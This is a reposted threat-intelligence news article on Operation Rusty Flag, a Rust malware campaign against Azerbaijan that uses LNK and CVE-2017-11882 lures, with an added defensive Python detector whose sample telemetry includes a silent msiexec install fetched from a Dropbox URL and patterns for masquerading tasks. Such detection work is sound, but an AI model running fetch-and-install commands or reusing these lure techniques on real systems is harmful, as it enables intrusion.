
    Azerbaijan Targeted in New Rust-Based Malware Campaign

By justmattg, September 19, 2023

Sep 19, 2023 | THN | Cyber Attack / Threat Intel

    Targets located in Azerbaijan have been singled out as part of a new campaign that’s designed to deploy Rust-based malware on compromised systems.

    Cybersecurity firm Deep Instinct is tracking the operation under the name Operation Rusty Flag. It has not been associated with any known threat actor or group.

“The operation has at least two different initial access vectors,” security researchers Simon Kenin, Ron Ben Yizhak, and Mark Vaitzman said in an analysis published last week. “One of the lures used in the operation is a modified document that was used by the Storm-0978 group. This could be a deliberate ‘false flag.’”

    The attack chain leverages an LNK file named 1.KARABAKH.jpg.lnk as a launchpad to retrieve a second-stage payload, an MSI installer, hosted on Dropbox.

    The installer file, for its part, drops an implant written in Rust, an XML file for a scheduled task to execute the implant, and a decoy image file that features watermarks of the symbol of the Azerbaijan Ministry of Defense.

    An alternate infection vector is a Microsoft Office document named “Overview_of_UWCs_UkraineInNATO_campaign.docx,” which exploits CVE-2017-11882, a six-year-old memory corruption vulnerability in Microsoft Office’s Equation Editor, to invoke a Dropbox URL hosting a different MSI file serving a variant of the same Rust backdoor.

    The use of Overview_of_UWCs_UkraineInNATO_campaign.docx is noteworthy, as a lure with the same filename was leveraged by Storm-0978 (aka RomCom, Tropical Scorpius, UNC2596, and Void Rabisu) in recent cyber attacks targeting Ukraine that exploit an Office remote code execution flaw (CVE-2023-36884).


    “This action looks like a deliberate false flag attempt to pin this attack on Storm-0978,” the researchers said.

The Rust backdoor, one variant of which masquerades as “WinDefenderHealth.exe,” comes fitted with capabilities to gather information from the compromised host and send it to an attacker-controlled server.
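The chain described above has three observable stages a defender can look for: a shortcut file carrying a double extension (an image name ending in `.lnk`), `msiexec` fetching a package from a file-sharing host, and a scheduled task whose executable borrows a security-product name but lives in a user-writable directory. The following is an added example written for this page, not code from Deep Instinct or from the article; the event records, the field names, the Dropbox URL and the task XML are constructed for illustration, and only the filenames `1.KARABAKH.jpg.lnk` and `WinDefenderHealth.exe` come from the report.

```python
"""Heuristic detections for the staging pattern described in the article.

Added example. Event schema (type/path/cmdline/xml) and sample values are
assumptions constructed here; they are not real telemetry or IoCs.
"""
import re
import xml.etree.ElementTree as ET
from pathlib import PureWindowsPath

# Extensions that an attacker hides behind in a "name.jpg.lnk" style lure.
LURE_INNER_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".bmp", ".docx", ".doc", ".pdf"}

# File-sharing host used for second-stage delivery in the report (pattern only).
FILE_HOST_RE = re.compile(r"https?://[^\s\"']*dropbox(?:usercontent)?\.com/[^\s\"']*", re.I)

# Windows Task Scheduler XML namespace (the real one; needed to locate <Exec>).
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Directory components that indicate a user-writable location.
USER_WRITABLE = {"users", "appdata", "temp", "programdata"}


def lnk_double_extension(path: str) -> bool:
    """True for a .lnk whose stem itself ends in an image/document extension."""
    p = PureWindowsPath(path)
    if p.suffix.lower() != ".lnk":
        return False
    return PureWindowsPath(p.stem).suffix.lower() in LURE_INNER_EXTS


def msi_from_file_host(cmdline: str) -> bool:
    """msiexec invoked with a package URL on a file-sharing host."""
    return "msiexec" in cmdline.lower() and bool(FILE_HOST_RE.search(cmdline))


def suspicious_task_xml(xml_text: str) -> bool:
    """Task whose Exec command looks like a security tool but runs from a user path."""
    root = ET.fromstring(xml_text)
    for cmd in root.findall(".//t:Exec/t:Command", TASK_NS):
        exe = PureWindowsPath((cmd.text or "").strip())
        name = exe.name.lower()
        looks_like_av = "defender" in name or "antivirus" in name  # heuristic, assumed
        in_user_dir = any(part.lower() in USER_WRITABLE for part in exe.parts)
        if looks_like_av and in_user_dir:
            return True
    return False


def scan_events(events):
    """Run the three heuristics over a list of event dicts; return (rule, evidence) pairs."""
    alerts = []
    for ev in events:
        if ev["type"] == "file_create" and lnk_double_extension(ev["path"]):
            alerts.append(("double_extension_lnk", ev["path"]))
        elif ev["type"] == "process" and msi_from_file_host(ev["cmdline"]):
            alerts.append(("msi_from_file_host", ev["cmdline"]))
        elif ev["type"] == "task_xml" and suspicious_task_xml(ev["xml"]):
            alerts.append(("masquerading_task", "scheduled task Exec command"))
    return alerts


# Constructed sample telemetry (not real data). The URL path is a placeholder.
SAMPLE_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Users\\alice\\AppData\\Roaming\\WinDefenderHealth.exe</Command>
    </Exec>
  </Actions>
</Task>"""

SAMPLE_EVENTS = [
    {"type": "file_create", "path": r"C:\Users\alice\Downloads\1.KARABAKH.jpg.lnk"},
    {"type": "file_create", "path": r"C:\Users\alice\Downloads\holiday.jpg"},
    {"type": "process", "cmdline": r"msiexec.exe /i https://www.dropbox.com/s/PLACEHOLDER/pkg.msi /qn"},
    {"type": "process", "cmdline": r"msiexec.exe /i C:\Windows\Temp\vendor-update.msi /qn"},
    {"type": "task_xml", "xml": SAMPLE_TASK_XML},
]

if __name__ == "__main__":
    for rule, evidence in scan_events(SAMPLE_EVENTS):
        print(f"{rule}: {evidence}")
```

Each heuristic is deliberately narrow so it can be tuned separately: the double-extension check fires on the file name alone, the `msiexec` check on the command line, and the task check on the XML that Task Scheduler stores under `C:\Windows\System32\Tasks`. The benign entries in the sample (a plain `.jpg`, a local MSI) are there to show that none of the rules fires on them.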

    The exact end goals of the campaign remain unclear at this stage. At the same time, the possibility that it could be a red team exercise has not been discounted.

    “Rust is becoming more popular among malware authors,” the researchers said. “Security products are not yet detecting Rust malware accurately, and the reverse engineering process is more complex.”
